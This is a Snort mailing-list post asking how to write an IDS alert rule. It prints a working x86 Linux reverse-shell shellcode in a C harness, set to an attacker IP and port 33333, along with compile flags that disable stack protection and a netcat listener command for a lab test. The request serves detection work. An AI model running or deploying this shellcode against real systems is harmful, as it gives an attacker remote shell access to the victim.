Write rule alert shellcode

[nguyen cao via Snort-users <snort-users () lists snort org>]

I use shellcode:
#include <stdio.h>
#include <string.h>

 char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85"  // <— change ip address of attacker
"\x66\x68"
"\x82\x35"          // <— port 33333
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc,char **argv) {
    int(*func)();
    func=(int(*)())code;
    (int)(*func)();
}
command run : gcc namefile.c -o namefile -fno-stack-protector -z execstack
When running the command above I was shellcode. Attacker and victim are use
kali linux.
- attacker run command : " nv -lvp 33333 "
- victim run command : " ./namefile " ( run file shellcode )
When the victim runs the command. The attacker opens the connection to the
victim
I tried several ways but could not write rule alert for this type of
attack! Hope everybody help please

_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!